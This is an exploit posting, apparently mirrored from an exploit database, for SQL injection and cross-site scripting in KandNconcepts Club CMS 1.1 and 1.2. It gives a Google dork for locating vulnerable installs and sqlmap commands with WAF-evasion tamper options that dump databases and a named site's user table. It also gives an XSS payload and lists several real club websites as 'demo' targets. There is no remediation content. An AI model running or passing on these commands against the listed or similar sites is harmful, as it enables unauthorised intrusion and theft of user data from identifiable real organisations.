Exploit for KandNconcepts Club CMS 1.1 / 1.2 Cross Site Scripting / SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:157049
# Exploit Title: KandNconcepts Club CMS 1.x SQL Injection & XSS Vulnerability  
# Google Dork:intext:"K & N Concepts Ltd"  
# Date: 2020-03-31  
# Exploit Author: @ThelastVvV  
# Vendor Homepage:https://it-it.facebook.com/kandnconcepts / kandnconcepts.co.uk  
# Version: 1.1&1.2  
# Tested on: Ubuntu  
  
---------------------------------------------------------  
  
PoC 1:  
The attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp   
Payload(s)  
  
http://www.site.com/content.php?Id=[]'[SQL INJECTION VULNERABILITY!]  
  
SQLMAP Payload(s):  
  
sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs  
  
sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D thursounited_co --tables  
  
sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D thursounited_co -T tufc_users   
  
  
  
  
PoC 2 :  
  
XSS Vulnerability  
  
Payload(s) :  
  
"><img src=x onerror=prompt(document.domain);>  
  
use payload:  
http://www.thursounited.co.uk/team.php?id=1%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E  
  
www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>  
  
  
  
Demos:  
  
http://www.thursounited.co.uk/team.php?id=1'  
https://www.nairncountyarchive.co.uk/player.php?id=11'  
https://clydebankfc.co.uk/player.php?id=364'  
http://www.wick-academy.co.uk/playerstats/player.php?id=304'  
http://northcaleyfa.com/club.php?id=42'